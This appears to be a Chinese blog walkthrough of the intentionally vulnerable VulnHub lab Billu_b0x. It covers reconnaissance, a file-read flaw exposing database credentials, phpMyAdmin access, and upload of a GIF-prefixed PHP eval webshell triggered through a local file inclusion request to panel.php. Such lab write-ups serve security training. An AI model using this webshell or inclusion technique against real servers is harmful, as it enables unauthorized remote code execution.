vulhub靶机Billu_b0x

1.下载靶机

https://download.vulnhub.com/billu/Billu\\_b0x.zip

2.信息收集

kali和靶机ip

访问靶机ip

扫描敏感目录

3.漏洞挖掘

一一访问每个文件

发现add.php是一个上传界面,但是功能无法使用,查看源码文件发现只是个页面,没有后台处理代码。in.php是php info信息。test文件下貌似可以进行传参

file传参

get传参不可以,用bp抓包转换为post传参

查看c.php源码

这是数据库连接文件,发现mysql连接用户名密码:

用户名:billu

密码:b0x_billu

数据库名:ica_lab

通过得到的mysql密码登录phpmyadmin成功

ica_lab数据库的auth表中,找到web登录的用户名:biLLu,密码:hEx_it。

登录web界面

上传图片,查看图片,存在目录浏览

webshell连接

上传图片马

GIF89a
<?php @eval($_POST['cmd']);?>

然后使用POST传参

http://192.168.126.170/panel.php

load=uploaded_images/2.png&continue=continue

蚁剑连接

相关推荐
Whoisshutiao7 分钟前
网安-XSS-pikachu
前端·安全·网络安全
还是奇怪1 小时前
Linux - 安全排查 2
linux·运维·安全
tan77º3 小时前
【Linux网络编程】Socket - UDP
linux·服务器·网络·c++·udp
czhc11400756633 小时前
Linux 76 rsync
linux·运维·python
蓝易云4 小时前
Qt框架中connect()方法的ConnectionType参数使用说明 点击改变文章字体大小
linux·前端·后端
花落已飘4 小时前
多线程 vs 异步
linux·网络·系统架构
PanZonghui5 小时前
Centos项目部署之Nginx部署项目
linux·nginx
码出钞能力5 小时前
linux内核模块的查看
linux·运维·服务器
星辰云-6 小时前
# Linux Centos系统硬盘分区扩容
linux·运维·centos·磁盘扩容
聽雨2376 小时前
02每日简报20250704
linux·科技·金融·生活·社交电子·娱乐·媒体